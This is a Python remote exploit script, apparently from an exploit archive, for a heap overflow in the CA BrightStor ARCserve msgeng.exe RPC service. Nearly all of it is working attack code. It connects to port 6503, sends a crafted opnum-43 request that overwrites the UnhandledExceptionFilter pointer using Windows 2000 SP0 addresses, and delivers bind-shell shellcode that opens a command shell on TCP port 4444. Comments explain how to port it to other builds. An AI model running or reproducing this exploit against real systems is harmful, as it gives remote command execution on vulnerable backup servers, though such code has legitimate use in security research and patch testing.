CA BrightStor ARCserve (msgeng.exe) Remote Heap Overflow Exploit

Date: 2007-01-27  Author: Winny Thomas
#!/usr/bin/python
# I couldn't find a reliable exploit for my analysis and so came up with this.
# Remote exploit for the CA BrightStor msgeng.exe service heap overflow
# vulnerability as described in LS-20060313.pdf on lssec.com. The exploit was
# tested on Windows 2000 SP0 only. It opens a shell on TCP port 4444. It
# shouldn't be hard to port to other platforms, but note that the two
# addresses below are build-specific: the exploit overwrites the
# UnhandledExceptionFilter pointer (at 77EE044C on Windows 2000 SP0) with the
# address of a `call dword ptr [esi+4C]` gadget in user32.dll. At the time the
# UEF is called, [esi+4C] points at our shellcode. Against any other build the
# write lands elsewhere and will most likely just crash the service.
#
# Winny M Thomas ;-)
# Author shall bear no responsibility for any screw ups caused by using this code

from impacket.dcerpc import transport, dcerpc
from impacket import uuid
import struct
import sys

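# Windows 2000 SP0 addresses used by the write-4 primitive. Both are build
# specific: the value written is a `call dword ptr [esi+4Ch]` gadget in
# user32.dll, the destination is the UnhandledExceptionFilter pointer.
# Porting to another build means replacing exactly these two values.
CALL_ESI_4C_ADDR = 0x77E4FB7A
UEF_ADDR = 0x77EE044C

# RPC endpoint of msgeng.exe and the vulnerable interface/opnum.
MSGENG_PORT = 6503
MSGENG_UUID = ('dc246bf0-7a7a-11ce-9f88-00805fe43838', '1.0')
MSGENG_OPNUM = 43

# Port-binding shellcode: opens a shell on TCP port 4444. Written as a bytes
# literal so the escapes are real bytes (the listing had lost its backslashes)
# and so it concatenates cleanly with struct.pack() on Python 2.6+ and 3.
_BINDSHELL_4444 = (
    b"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xe0"
    b"\x6f\xe3\x2a\x83\xeb\xfc\xe2\xf4\x1c\x05\x08\x67\x08\x96\x1c\xd5"
    b"\x1f\x0f\x68\x46\xc4\x4b\x68\x6f\xdc\xe4\x9f\x2f\x98\x6e\x0c\xa1"
    b"\xaf\x77\x68\x75\xc0\x6e\x08\x63\x6b\x5b\x68\x2b\x0e\x5e\x23\xb3"
    b"\x4c\xeb\x23\x5e\xe7\xae\x29\x27\xe1\xad\x08\xde\xdb\x3b\xc7\x02"
    b"\x95\x8a\x68\x75\xc4\x6e\x08\x4c\x6b\x63\xa8\xa1\xbf\x73\xe2\xc1"
    b"\xe3\x43\x68\xa3\x8c\x4b\xff\x4b\x23\x5e\x38\x4e\x6b\x2c\xd3\xa1"
    b"\xa0\x63\x68\x5a\xfc\xc2\x68\x6a\xe8\x31\x8b\xa4\xae\x61\x0f\x7a"
    b"\x1f\xb9\x85\x79\x86\x07\xd0\x18\x88\x18\x90\x18\xbf\x3b\x1c\xfa"
    b"\x88\xa4\x0e\xd6\xdb\x3f\x1c\xfc\xbf\xe6\x06\x4c\x61\x82\xeb\x28"
    b"\xb5\x05\xe1\xd5\x30\x07\x3a\x23\x15\xc2\xb4\xd5\x36\x3c\xb0\x79"
    b"\xb3\x3c\xa0\x79\xa3\x3c\x1c\xfa\x86\x07\xf2\x76\x86\x3c\x6a\xcb"
    b"\x75\x07\x47\x30\x90\xa8\xb4\xd5\x36\x05\xf3\x7b\xb5\x90\x33\x42"
    b"\x44\xc2\xcd\xc3\xb7\x90\x35\x79\xb5\x90\x33\x42\x05\x26\x65\x63"
    b"\xb7\x90\x35\x7a\xb4\x3b\xb6\xd5\x30\xfc\x8b\xcd\x99\xa9\x9a\x7d"
    b"\x1f\xb9\xb6\xd5\x30\x09\x89\x4e\x86\x07\x80\x47\x69\x8a\x89\x7a"
    b"\xb9\x46\x2f\xa3\x07\x05\xa7\xa3\x02\x5e\x23\xd9\x4a\x91\xa1\x07"
    b"\x1e\x2d\xcf\xb9\x6d\x15\xdb\x81\x4b\xc4\x8b\x58\x1e\xdc\xf5\xd5"
    b"\x95\x2b\x1c\xfc\xbb\x38\xb1\x7b\xb1\x3e\x89\x2b\xb1\x3e\xb6\x7b"
    b"\x1f\xbf\x8b\x87\x39\x6a\x2d\x79\x1f\xb9\x89\xd5\x1f\x58\x1c\xfa"
    b"\x6b\x38\x1f\xa9\x24\x0b\x1c\xfc\xb2\x90\x33\x42\x10\xe5\xe7\x75"
    b"\xb3\x90\x35\xd5\x30\x6f\xe3\x2a"
)


def _build_payload(call_addr=CALL_ESI_4C_ADDR, uef_addr=UEF_ADDR):
    """Build the opnum-43 request body and return it as bytes.

    Layout: 676 bytes of filler, a short NOP run ending in ``jmp +0x0a``,
    the write-4 pair (value first, destination second, little-endian),
    an 8-byte NOP pad, then the bind-shell shellcode.

    Args:
        call_addr: address written into the UEF slot (the gadget).
        uef_addr: address of the UnhandledExceptionFilter pointer.
    """
    payload = b"A" * 676
    payload += b"\x90" * 4
    # Two NOPs, then jmp short +10: skips the 8 pointer bytes below and
    # lands inside the NOP pad in front of the shellcode.
    payload += b"\x90\x90\xeb\x0a"
    # Write-4: *uef_addr = call_addr. When the UEF fires, [esi+4C] points
    # back into this buffer, so the gadget transfers control to the shellcode.
    payload += struct.pack("<L", call_addr)
    payload += struct.pack("<L", uef_addr)
    payload += b"\x90" * 8
    payload += _BINDSHELL_4444
    return payload


def DCEconnectAndExploit(target, port=MSGENG_PORT,
                         call_addr=CALL_ESI_4C_ADDR, uef_addr=UEF_ADDR):
    """Bind to the msgeng.exe RPC interface on ``target`` and send opnum 43.

    Args:
        target: IP address or hostname of the BrightStor host.
        port: TCP port of the msgeng.exe RPC endpoint (default 6503).
        call_addr: gadget address written by the write-4 (build-specific).
        uef_addr: UnhandledExceptionFilter pointer address (build-specific).

    Returns:
        None. Success is observed out of band (a shell listening on 4444).

    Raises:
        Whatever impacket raises if the connect or bind fails.
    """
    trans = transport.TCPTransport(target, port)
    trans.connect()
    dce = dcerpc.DCERPC_v5(trans)
    dce.bind(uuid.uuidtup_to_bin(MSGENG_UUID))
    dce.call(MSGENG_OPNUM, _build_payload(call_addr, uef_addr))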

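if __name__ == '__main__':
    # Usage: <script> <target ip>. Exit non-zero when the target is missing.
    try:
        target = sys.argv[1]
    except IndexError:
        # Parenthesised so it works as a Py2 print statement and a Py3 call;
        # the listing had the "\n" escape in this literal mangled into a
        # real line break, which left the string unterminated.
        print('Usage: %s <target ip>\n' % sys.argv[0])
        sys.exit(-1)

    DCEconnectAndExploit(target)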

# milw0rm.com [2007-01-27]
